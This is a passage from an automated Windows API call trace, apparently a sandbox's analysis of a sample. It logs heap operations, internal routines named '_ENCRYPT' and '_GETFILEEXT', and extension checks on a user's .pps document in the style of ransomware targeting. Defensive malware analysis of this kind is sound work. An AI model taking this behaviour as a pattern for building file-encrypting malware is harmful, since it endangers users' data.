lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.778] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.779] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.780] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0033.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.780] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.780] CloseHandle (hObject=0x128) returned 1 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.781] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.781] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.781] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.781] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.781] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.781] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.782] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.782] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.782] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.782] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ea7870, ftCreationTime.dwHighDateTime=0x1d5b8f7, ftLastAccessTime.dwLowDateTime=0xeae0d5a0, ftLastAccessTime.dwHighDateTime=0x1d5c152, ftLastWriteTime.dwLowDateTime=0xeae0d5a0, ftLastWriteTime.dwHighDateTime=0x1d5c152, nFileSizeHigh=0x0, nFileSizeLow=0x18da3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6v0 IGSxNnE4wY28.pps", cAlternateFileName="6V0IGS~1.PPS")) returned 0x7c20c0 [0033.782] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.782] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ea7870, ftCreationTime.dwHighDateTime=0x1d5b8f7, ftLastAccessTime.dwLowDateTime=0xeae0d5a0, ftLastAccessTime.dwHighDateTime=0x1d5c152, ftLastWriteTime.dwLowDateTime=0xeae0d5a0, ftLastWriteTime.dwHighDateTime=0x1d5c152, nFileSizeHigh=0x0, nFileSizeLow=0x18da3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6v0 IGSxNnE4wY28.pps", cAlternateFileName="6V0IGS~1.PPS")) returned 0x7c20c0 [0033.782] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.782] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 